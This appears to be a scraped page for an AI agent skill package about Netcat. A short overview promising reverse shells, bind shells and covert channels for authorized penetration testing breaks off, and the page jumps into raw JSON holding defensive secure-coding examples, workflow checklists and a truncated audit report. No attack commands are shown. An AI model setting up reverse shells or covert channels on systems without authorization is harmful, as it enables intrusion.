Netcat Network Utility Overview Netcat (nc) is the "Swiss Army knife" of networking tools, providing simple Unix utility for reading and writing data across network connections. This skill covers authorized offensive security applications including reverse shells, bind shells, file transfers, port scanning, and banner grabbing. IMPORTANT : Netcat capabilities can be used maliciously. Only use these techniques in authorized penetration testing environments with proper written permission. Quick Start Basic connection and listening: Core Workflow Netcat Operations Workflow Progress: [ ] 1. Verif…

, user_id):\n raise ValueError(\"Invalid user ID format\")\n\n# Use ORM query builders\nuser = User.query.filter_by(id=user_id).first()\n```\n\n**Step 4: Implement least privilege**\n- Database user should have minimum required permissions\n- Use read-only accounts for SELECT operations\n- Never use admin/root accounts for application queries\n\n### XSS Remediation\n\n**Step 1: Enable auto-escaping**\n- Most modern frameworks escape by default\n- Ensure auto-escaping is not disabled\n\n**Step 2: Use framework-specific safe methods**\n\n```javascript\n// React: Use JSX (auto-escapes)\n\u003cdiv>{userInput}\u003c/div>\n\n// Vue: Use template syntax (auto-escapes)\n\u003cdiv>{{ userInput }}\u003c/div>\n\n// Angular: Use property binding (auto-escapes)\n\u003cdiv [textContent]=\"userInput\">\u003c/div>\n```\n\n**Step 3: Sanitize when HTML is required**\n\n```javascript\nimport DOMPurify from 'dompurify';\n\n// Sanitize HTML content\nconst clean = DOMPurify.sanitize(userHTML, {\n ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],\n ALLOWED_ATTR: []\n});\n```\n\n**Step 4: Content Security Policy (CSP)**\n\n```html\n\u003c!-- Add CSP header -->\nContent-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'\n```\n\n---\n\n## Advanced Configuration\n\nThis section contains detailed configuration options and tuning parameters.\n\n### Example: SAST Tool Configuration\n\n```yaml\n# Advanced security scanner configuration\nscanner:\n # Severity threshold\n severity_threshold: MEDIUM\n\n # Rule configuration\n rules:\n enabled:\n - sql-injection\n - xss\n - hardcoded-secrets\n disabled:\n - informational-only\n\n # False positive reduction\n confidence_threshold: HIGH\n exclude_patterns:\n - \"*/test/*\"\n - \"*/tests/*\"\n - \"*/node_modules/*\"\n - \"*.test.js\"\n - \"*.spec.ts\"\n\n # Performance tuning\n max_file_size_kb: 2048\n timeout_seconds: 300\n parallel_jobs: 4\n\n # Output configuration\n output_format: json\n include_code_snippets: true\n max_snippet_lines: 10\n```\n\n---\n\n## Examples and Code Samples\n\nThis section provides comprehensive code examples for various scenarios.\n\n### Example 1: Secure API Authentication\n\n```python\n# Secure API key handling\nimport os\nfrom functools import wraps\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n# Load API key from environment (never hardcode)\nVALID_API_KEY = os.environ.get('API_KEY')\nif not VALID_API_KEY:\n raise ValueError(\"API_KEY environment variable not set\")\n\ndef require_api_key(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n api_key = request.headers.get('X-API-Key')\n\n if not api_key:\n return jsonify({'error': 'API key required'}), 401\n\n # Constant-time comparison to prevent timing attacks\n import hmac\n if not hmac.compare_digest(api_key, VALID_API_KEY):\n return jsonify({'error': 'Invalid API key'}), 403\n\n return f(*args, **kwargs)\n return decorated_function\n\[email protected]('/api/secure-endpoint')\n@require_api_key\ndef secure_endpoint():\n return jsonify({'message': 'Access granted'})\n```\n\n### Example 2: Secure Password Hashing\n\n```python\n# Secure password storage with bcrypt\nimport bcrypt\n\ndef hash_password(password: str) -> str:\n \"\"\"Hash a password using bcrypt.\"\"\"\n # Generate salt and hash password\n salt = bcrypt.gensalt(rounds=12) # Cost factor: 12 (industry standard)\n hashed = bcrypt.hashpw(password.encode('utf-8'), salt)\n return hashed.decode('utf-8')\n\ndef verify_password(password: str, hashed: str) -> bool:\n \"\"\"Verify a password against a hash.\"\"\"\n return bcrypt.checkpw(\n password.encode('utf-8'),\n hashed.encode('utf-8')\n )\n\n# Usage\nstored_hash = hash_password(\"user_password\")\nis_valid = verify_password(\"user_password\", stored_hash) # True\n```\n\n### Example 3: Secure File Upload\n\n```python\n# Secure file upload with validation\nimport os\nimport magic\nfrom werkzeug.utils import secure_filename\n\nALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg'}\nALLOWED_MIME_TYPES = {\n 'application/pdf',\n 'image/png',\n 'image/jpeg'\n}\nMAX_FILE_SIZE = 5 * 1024 * 1024 # 5 MB\n\ndef is_allowed_file(filename: str, file_content: bytes) -> bool:\n \"\"\"Validate file extension and MIME type.\"\"\"\n # Check extension\n if '.' not in filename:\n return False\n\n ext = filename.rsplit('.', 1)[1].lower()\n if ext not in ALLOWED_EXTENSIONS:\n return False\n\n # Check MIME type (prevent extension spoofing)\n mime = magic.from_buffer(file_content, mime=True)\n if mime not in ALLOWED_MIME_TYPES:\n return False\n\n return True\n\ndef handle_upload(file):\n \"\"\"Securely handle file upload.\"\"\"\n # Check file size\n file.seek(0, os.SEEK_END)\n size = file.tell()\n file.seek(0)\n\n if size > MAX_FILE_SIZE:\n raise ValueError(\"File too large\")\n\n # Read content for validation\n content = file.read()\n file.seek(0)\n\n # Validate file type\n if not is_allowed_file(file.filename, content):\n raise ValueError(\"Invalid file type\")\n\n # Sanitize filename\n filename = secure_filename(file.filename)\n\n # Generate unique filename to prevent overwrite attacks\n import uuid\n unique_filename = f\"{uuid.uuid4()}_{filename}\"\n\n # Save to secure location (outside web root)\n upload_path = os.path.join('/secure/uploads', unique_filename)\n file.save(upload_path)\n\n return unique_filename\n```\n\n---\n\n## Best Practices for Reference Documents\n\n1. **Start with \"When to use\"** - Help Claude know when to load this reference\n2. **Include table of contents** - For documents >100 lines\n3. **Use concrete examples** - Code samples with vulnerable and fixed versions\n4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context\n5. **Provide remediation** - Don't just identify issues, show how to fix them\n6. **Organize logically** - Group related content, use clear headings\n7. **Keep examples current** - Use modern patterns and current framework versions\n8. **Be concise** - Even in references, challenge every sentence\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":15672,"content_sha256":"d830809dec44c82770c5ef0fe12831754f113931dc739891a1ec8186aefc629f"},{"filename":"references/WORKFLOW_CHECKLIST.md","content":"# Workflow Checklist Template\n\nThis template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.\n\n## Pattern 1: Sequential Workflow Checklist\n\nUse this pattern for operations that must be completed in order, step-by-step.\n\n### Security Assessment Workflow\n\nProgress:\n[ ] 1. Identify application entry points and attack surface\n[ ] 2. Map authentication and authorization flows\n[ ] 3. Identify data flows and sensitive data handling\n[ ] 4. Review existing security controls\n[ ] 5. Document findings with framework references (OWASP, CWE)\n[ ] 6. Prioritize findings by severity (CVSS scores)\n[ ] 7. Generate report with remediation recommendations\n\nWork through each step systematically. Check off completed items.\n\n---\n\n## Pattern 2: Conditional Workflow\n\nUse this pattern when the workflow branches based on findings or conditions.\n\n### Vulnerability Remediation Workflow\n\n1. Identify vulnerability type\n - If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)\n - If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)\n - If Authentication flaw → See [auth-remediation.md](auth-remediation.md)\n - If Authorization flaw → See [authz-remediation.md](authz-remediation.md)\n - If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)\n\n2. Assess severity using CVSS calculator\n - If CVSS >= 9.0 → Priority: Critical (immediate action)\n - If CVSS 7.0-8.9 → Priority: High (action within 24h)\n - If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)\n - If CVSS \u003c 4.0 → Priority: Low (action within 30 days)\n\n3. Apply appropriate remediation pattern\n4. Validate fix with security testing\n5. Document changes and update security documentation\n\n---\n\n## Pattern 3: Iterative Workflow\n\nUse this pattern for operations that repeat across multiple targets or items.\n\n### Code Security Review Workflow\n\nFor each file in the review scope:\n1. Identify security-sensitive operations (auth, data access, crypto, input handling)\n2. Check against secure coding patterns for the language\n3. Flag potential vulnerabilities with severity rating\n4. Map findings to CWE and OWASP categories\n5. Suggest specific remediation approaches\n6. Document finding with code location and fix priority\n\nContinue until all files in scope have been reviewed.\n\n---\n\n## Pattern 4: Feedback Loop Workflow\n\nUse this pattern when validation and iteration are required.\n\n### Secure Configuration Generation Workflow\n\n1. Generate initial security configuration based on requirements\n2. Run validation script: `./scripts/validate_config.py config.yaml`\n3. Review validation output:\n - Note all errors (must fix)\n - Note all warnings (should fix)\n - Note all info items (consider)\n4. Fix identified issues in configuration\n5. Repeat steps 2-4 until validation passes with zero errors\n6. Review warnings and determine if they should be addressed\n7. Apply configuration once validation is clean\n\n**Validation Loop**: Run validator → Fix errors → Repeat until clean\n\n---\n\n## Pattern 5: Parallel Analysis Workflow\n\nUse this pattern when multiple independent analyses can run concurrently.\n\n### Comprehensive Security Scan Workflow\n\nRun these scans in parallel:\n\n**Static Analysis**:\n[ ] 1a. Run SAST scan (Semgrep/Bandit)\n[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)\n[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)\n[ ] 1d. Run license compliance check\n\n**Dynamic Analysis**:\n[ ] 2a. Run DAST scan (ZAP/Burp)\n[ ] 2b. Run API security testing\n[ ] 2c. Run authentication/authorization testing\n\n**Infrastructure Analysis**:\n[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)\n[ ] 3b. Run container image scan (Trivy/Grype)\n[ ] 3c. Run configuration review\n\n**Consolidation**:\n[ ] 4. Aggregate all findings\n[ ] 5. Deduplicate and correlate findings\n[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)\n[ ] 7. Generate unified security report\n\n---\n\n## Pattern 6: Research and Documentation Workflow\n\nUse this pattern for security research and documentation tasks.\n\n### Threat Modeling Workflow\n\nResearch Progress:\n[ ] 1. Identify system components and boundaries\n[ ] 2. Map data flows between components\n[ ] 3. Identify trust boundaries\n[ ] 4. Enumerate assets (data, services, credentials)\n[ ] 5. Apply STRIDE framework to each component:\n - Spoofing threats\n - Tampering threats\n - Repudiation threats\n - Information disclosure threats\n - Denial of service threats\n - Elevation of privilege threats\n[ ] 6. Map threats to MITRE ATT&CK techniques\n[ ] 7. Identify existing mitigations\n[ ] 8. Document residual risks\n[ ] 9. Recommend additional security controls\n[ ] 10. Generate threat model document\n\nWork through each step systematically. Check off completed items.\n\n---\n\n## Pattern 7: Compliance Validation Workflow\n\nUse this pattern for compliance checks against security standards.\n\n### Security Compliance Audit Workflow\n\n**SOC 2 Controls Review**:\n[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)\n[ ] 2. Verify logical access controls implementation (CC6.1)\n[ ] 3. Review authentication mechanisms (CC6.1)\n[ ] 4. Verify encryption implementation (CC6.1, CC6.7)\n[ ] 5. Review audit logging configuration (CC7.2)\n[ ] 6. Verify security monitoring (CC7.2, CC7.3)\n[ ] 7. Review incident response procedures (CC7.3, CC7.4)\n[ ] 8. Verify backup and recovery processes (A1.2, A1.3)\n\n**Evidence Collection**:\n[ ] 9. Collect policy documents\n[ ] 10. Collect configuration screenshots\n[ ] 11. Collect audit logs\n[ ] 12. Document control gaps\n[ ] 13. Generate compliance report\n\n---\n\n## Pattern 8: Incident Response Workflow\n\nUse this pattern for security incident handling.\n\n### Security Incident Response Workflow\n\n**Detection and Analysis**:\n[ ] 1. Confirm security incident (rule out false positive)\n[ ] 2. Determine incident severity (SEV1/2/3/4)\n[ ] 3. Identify affected systems and data\n[ ] 4. Preserve evidence (logs, memory dumps, network captures)\n\n**Containment**:\n[ ] 5. Isolate affected systems (network segmentation)\n[ ] 6. Disable compromised accounts\n[ ] 7. Block malicious indicators (IPs, domains, hashes)\n[ ] 8. Implement temporary compensating controls\n\n**Eradication**:\n[ ] 9. Identify root cause\n[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)\n[ ] 11. Patch vulnerabilities exploited\n[ ] 12. Reset compromised credentials\n\n**Recovery**:\n[ ] 13. Restore systems from clean backups (if needed)\n[ ] 14. Re-enable systems with monitoring\n[ ] 15. Verify system integrity\n[ ] 16. Resume normal operations\n\n**Post-Incident**:\n[ ] 17. Document incident timeline\n[ ] 18. Identify lessons learned\n[ ] 19. Update security controls to prevent recurrence\n[ ] 20. Update incident response procedures\n[ ] 21. Communicate with stakeholders\n\n---\n\n## Usage Guidelines\n\n### When to Use Workflow Checklists\n\n✅ **Use checklists for**:\n- Complex multi-step operations\n- Operations requiring specific order\n- Security assessments and audits\n- Incident response procedures\n- Compliance validation tasks\n\n❌ **Don't use checklists for**:\n- Simple single-step operations\n- Highly dynamic exploratory work\n- Operations that vary significantly each time\n\n### Adapting This Template\n\n1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file\n2. **Customize steps** to match your specific security tool or process\n3. **Add framework references** (OWASP, CWE, NIST) where applicable\n4. **Include tool-specific commands** for automation\n5. **Add decision points** where manual judgment is required\n\n### Checklist Best Practices\n\n- **Be specific**: \"Run semgrep --config=auto .\" not \"Scan the code\"\n- **Include success criteria**: \"Validation passes with 0 errors\"\n- **Reference standards**: Link to OWASP, CWE, NIST where relevant\n- **Show progress**: Checkbox format helps track completion\n- **Provide escape hatches**: \"If validation fails, see troubleshooting.md\"\n\n### Integration with Feedback Loops\n\nCombine checklists with validation scripts for maximum effectiveness:\n\n1. Create checklist for the workflow\n2. Provide validation script that checks quality\n3. Include \"run validator\" step in checklist\n4. Loop: Complete step → Validate → Fix issues → Re-validate\n\nThis pattern dramatically improves output quality through systematic validation.\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":8390,"content_sha256":"f667c8d5c6e5c50b491643d644082ff202a6bb94476e0e7b648c6d0e5c8a080f"},{"filename":"skill-report.json","content":"{\n \"schema_version\": \"2.0\",\n \"meta\": {\n \"generated_at\": \"2026-01-16T15:46:45.414Z\",\n \"slug\": \"agentsecops-network-netcat\",\n \"source_url\": \"https://github.com/AgentSecOps/SecOpsAgentKit/tree/main/skills/offsec/network-netcat\",\n \"source_ref\": \"main\",\n \"model\": \"claude\",\n \"analysis_version\": \"3.0.0\",\n \"source_type\": \"community\",\n \"content_hash\": \"ac1104f74fe8a3832410ee6b9d7f337807288d8e32f873795613d7cbc4773b0f\",\n \"tree_hash\": \"1d21b3379d56d2f45414b14ce61dfeee86bce48264f8447e344af368aa0165c9\"\n },\n \"skill\": {\n \"name\": \"network-netcat\",\n \"description\": \"Network utility for reading and writing data across TCP/UDP connections, port scanning, file transfers, and backdoor communication channels. Use when: (1) Testing network connectivity and port availability, (2) Creating reverse shells and bind shells for authorized penetration testing, (3) Transferring files between systems in restricted environments, (4) Banner grabbing and service enumeration, (5) Establishing covert communication channels, (6) Testing firewall rules and network segmentation.\\n\",\n \"summary\": \"Network utility for reading and writing data across TCP/UDP connections, port scanning, file transfe...\",\n \"icon\": \"🔧\",\n \"version\": \"0.1.0\",\n \"author\": \"AgentSecOps\",\n \"license\": \"MIT\",\n \"category\": \"offsec\",\n \"tags\": [\n \"networking\",\n \"netcat\",\n \"reverse-shell\",\n \"file-transfer\",\n \"port-scanning\",\n \"banner-grabbing\"\n ],\n \"supported_tools\": [\n \"claude\",\n \"codex\",\n \"claude-code\"\n ],\n \"risk_factors\": [\n \"external_commands\",\n \"network\",\n \"filesystem\",\n \"env_access\",\n \"scripts\"\n ]\n },\n \"security_audit\": {\n \"risk_level\": \"low\",\n \"is_blocked\": false,\n \"safe_to_publish\": true,\n \"summary\": \"Documentation-only skill providing educational content for authorized penetration testing. Contains no executable code, scripts, or malicious payloads. All content explicitly requires written authorization and includes cleanup guidance. Static findings are false positives - the analyzer detected command examples in documentation, not actual code execution.\",\n \"risk_factor_evidence\": [\n {\n \"factor\": \"external_commands\",\n \"evidence\": [\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 298,\n \"line_end\": 298\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 301,\n \"line_end\": 301\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 304,\n \"line_end\": 304\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 307,\n \"line_end\": 307\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 310,\n \"line_end\": 310\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 134,\n \"line_end\": 134\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 250,\n \"line_end\": 250\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 291,\n \"line_end\": 291\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 54,\n \"line_end\": 74\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 74,\n \"line_end\": 95\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 95,\n \"line_end\": 108\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 108,\n \"line_end\": 111\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 111,\n \"line_end\": 118\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 118,\n \"line_end\": 122\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 122,\n \"line_end\": 129\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 129,\n \"line_end\": 135\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 135,\n \"line_end\": 151\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 151,\n \"line_end\": 154\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 154,\n \"line_end\": 162\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 162,\n \"line_end\": 296\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 296,\n \"line_end\": 306\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 306,\n \"line_end\": 309\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 309,\n \"line_end\": 318\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 318,\n \"line_end\": 333\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 333,\n \"line_end\": 342\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 342,\n \"line_end\": 346\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 346,\n \"line_end\": 354\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 354,\n \"line_end\": 358\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 358,\n \"line_end\": 361\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 361,\n \"line_end\": 371\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 371,\n \"line_end\": 404\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 404,\n \"line_end\": 414\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 414,\n \"line_end\": 447\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 447,\n \"line_end\": 451\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 451,\n \"line_end\": 472\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 472,\n \"line_end\": 476\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 476,\n \"line_end\": 537\n },\n {\n \"file\": \"references/WORKFLOW_CHECKLIST.md\",\n \"line_start\": 74,\n \"line_end\": 74\n },\n {\n \"file\": \"skill-report.json\",\n \"line_start\": 126,\n \"line_end\": 126\n },\n {\n \"file\": \"skill-report.json\",\n \"line_start\": 127,\n \"line_end\": 127\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 198,\n \"line_end\": 198\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 199,\n \"line_end\": 199\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 531,\n \"line_end\": 531\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 182,\n \"line_end\": 182\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 198,\n \"line_end\": 198\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 199,\n \"line_end\": 199\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 531,\n \"line_end\": 531\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 34,\n \"line_end\": 46\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 46,\n \"line_end\": 77\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 77,\n \"line_end\": 89\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 89,\n \"line_end\": 100\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 100,\n \"line_end\": 115\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 115,\n \"line_end\": 119\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 119,\n \"line_end\": 131\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 131,\n \"line_end\": 137\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 137,\n \"line_end\": 151\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 151,\n \"line_end\": 164\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 164,\n \"line_end\": 170\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 170,\n \"line_end\": 174\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 174,\n \"line_end\": 192\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 192,\n \"line_end\": 196\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 196,\n \"line_end\": 205\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 205,\n \"line_end\": 212\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 212,\n \"line_end\": 221\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 221,\n \"line_end\": 224\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 224,\n \"line_end\": 226\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 226,\n \"line_end\": 237\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 237,\n \"line_end\": 240\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 240,\n \"line_end\": 243\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 243,\n \"line_end\": 249\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 249,\n \"line_end\": 253\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 253,\n \"line_end\": 259\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 259,\n \"line_end\": 263\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 263,\n \"line_end\": 271\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 271,\n \"line_end\": 277\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 277,\n \"line_end\": 287\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 287,\n \"line_end\": 293\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 293,\n \"line_end\": 303\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 303,\n \"line_end\": 307\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 307,\n \"line_end\": 313\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 313,\n \"line_end\": 319\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 319,\n \"line_end\": 325\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 325,\n \"line_end\": 371\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 371,\n \"line_end\": 380\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 380,\n \"line_end\": 384\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 384,\n \"line_end\": 395\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 395,\n \"line_end\": 399\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 399,\n \"line_end\": 411\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 411,\n \"line_end\": 415\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 415,\n \"line_end\": 440\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 440,\n \"line_end\": 448\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 448,\n \"line_end\": 456\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 456,\n \"line_end\": 460\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 460,\n \"line_end\": 475\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 475,\n \"line_end\": 482\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 482,\n \"line_end\": 492\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 492,\n \"line_end\": 498\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 498,\n \"line_end\": 505\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 505,\n \"line_end\": 515\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 515,\n \"line_end\": 524\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 524,\n \"line_end\": 529\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 529,\n \"line_end\": 539\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 465,\n \"line_end\": 465\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 469,\n \"line_end\": 469\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 460,\n \"line_end\": 475\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 190,\n \"line_end\": 190\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 191,\n \"line_end\": 191\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 188,\n \"line_end\": 188\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 220,\n \"line_end\": 220\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 439,\n \"line_end\": 439\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 176,\n \"line_end\": 176\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 179,\n \"line_end\": 179\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 182,\n \"line_end\": 182\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 198,\n \"line_end\": 198\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 199,\n \"line_end\": 199\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 204,\n \"line_end\": 204\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 214,\n \"line_end\": 214\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 217,\n \"line_end\": 217\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 424,\n \"line_end\": 424\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 436,\n \"line_end\": 436\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 450,\n \"line_end\": 450\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 455,\n \"line_end\": 455\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 461,\n \"line_end\": 461\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 501,\n \"line_end\": 501\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 504,\n \"line_end\": 504\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 517,\n \"line_end\": 517\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 523,\n \"line_end\": 523\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 531,\n \"line_end\": 531\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 484,\n \"line_end\": 484\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 485,\n \"line_end\": 485\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 488,\n \"line_end\": 488\n }\n ]\n },\n {\n \"factor\": \"network\",\n \"evidence\": [\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 240,\n \"line_end\": 240\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 43,\n \"line_end\": 43\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 44,\n \"line_end\": 44\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 45,\n \"line_end\": 45\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 73,\n \"line_end\": 73\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 118,\n \"line_end\": 118\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 119,\n \"line_end\": 119\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 151,\n \"line_end\": 151\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 191,\n \"line_end\": 191\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 192,\n \"line_end\": 192\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 193,\n \"line_end\": 193\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 217,\n \"line_end\": 217\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 260,\n \"line_end\": 260\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 261,\n \"line_end\": 261\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 288,\n \"line_end\": 288\n },\n {\n \"file\": \"skill-report.json\",\n \"line_start\": 6,\n \"line_end\": 6\n },\n {\n \"file\": \"skill-report.json\",\n \"line_start\": 104,\n \"line_end\": 104\n },\n {\n \"file\": \"skill-report.json\",\n 